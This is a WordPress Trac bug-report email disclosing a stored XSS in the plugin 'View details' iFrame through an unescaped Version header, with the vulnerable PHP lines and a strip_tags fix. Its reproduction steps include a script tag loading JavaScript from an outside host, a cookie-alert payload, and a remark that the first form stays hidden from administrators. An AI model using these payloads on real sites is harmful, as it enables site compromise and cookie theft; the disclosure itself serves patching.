[wp-trac] [WordPress Trac] #53020: Stored XSS via «View details» plugin iFrame

WordPress Trac noreply at wordpress.org
Mon Apr 12 10:08:27 UTC 2021 

#53020: Stored XSS via «View details» plugin iFrame
----------------------------+-----------------------------
 Reporter:  m0ze            |      Owner:  (none)
     Type:  defect (bug)    |     Status:  new
 Priority:  normal          |  Milestone:  Awaiting Review
Component:  Security        |    Version:  trunk
 Severity:  normal          |   Keywords:  needs-patch
  Focuses:  administration  |
----------------------------+-----------------------------
 I found a way to use the XSS attack vector - through an iFrame with a
 detailed description of the plugin (plugin «View details» iFrame).

 === Possible operation options:

 * substitution or modification of the original plug-in to hide malicious
 code;

 * distribution of the modified plugin through third-party resources.


 === Steps To Reproduce:

 0. open any existed plugin from the official WordPress repo, f.e. Hello
 Dolly.
 1. change the version number to +1 (as a minimum) - from `Version: 1.7.2`
 to `Version: 1.7.3`.
 2. add your payload right after the last digit - `Version: 1.7.3<script
 src="https://m0ze.ru/payload.a.js"></script>`
 3. check the plugin info via dashboard, «View details» link.

 If you use the payload specifically as a `<script src=...></script>`, then
 visually, except for one digit in the plugin version, nothing will change.
 Other payloads also work (`<script>alert(document.cookie)</script>` etc.),
 but they add extra special characters on the right of the plugin version,
 which may alert the website administrator.


 === Screenshots:

 [[Image(https://i.imgur.com/7pz6UMh.png)]]

 [[Image(https://i.imgur.com/E7ejGkJ.png)]]

 [[Image(https://i.imgur.com/r2WQmFQ.png)]]


 === Code:

 **/wp-admin/includes/plugin-install.php, 881-884:**

 {{{#!php
 case 'newer_installed':
         /* translators: %s: Plugin version. */
         echo '<a class="button button-primary right disabled">' . sprintf(
 __( 'Newer Version (%s) Installed' ), $status['version'] ) . '</a>';
 break;
 }}}


 === Quick fix:

 `strip_tags($status['version'])`


 === Video:

 **YouTube short demo:** https://youtu.be/_IRcQ82wovY


 === Impact

 Malicious JavaScript code injections, the ability to combine attack
 vectors against the targeted system, which can lead to a complete
 compromise of the resource.


 There is also an unknown number of plugins that display diagnostic
 information about the site, including the names and versions of plugins,
 where this vulnerability will also be triggered, f.e.: Asset CleanUp: Page
 Speed Booster, WP Cerber Security, Anti-spam & Malware Scan and many other
 plugins.

-- 
Ticket URL: <https://core.trac.wordpress.org/ticket/53020>
WordPress Trac <https://core.trac.wordpress.org/>
WordPress publishing platform

More information about the wp-trac mailing list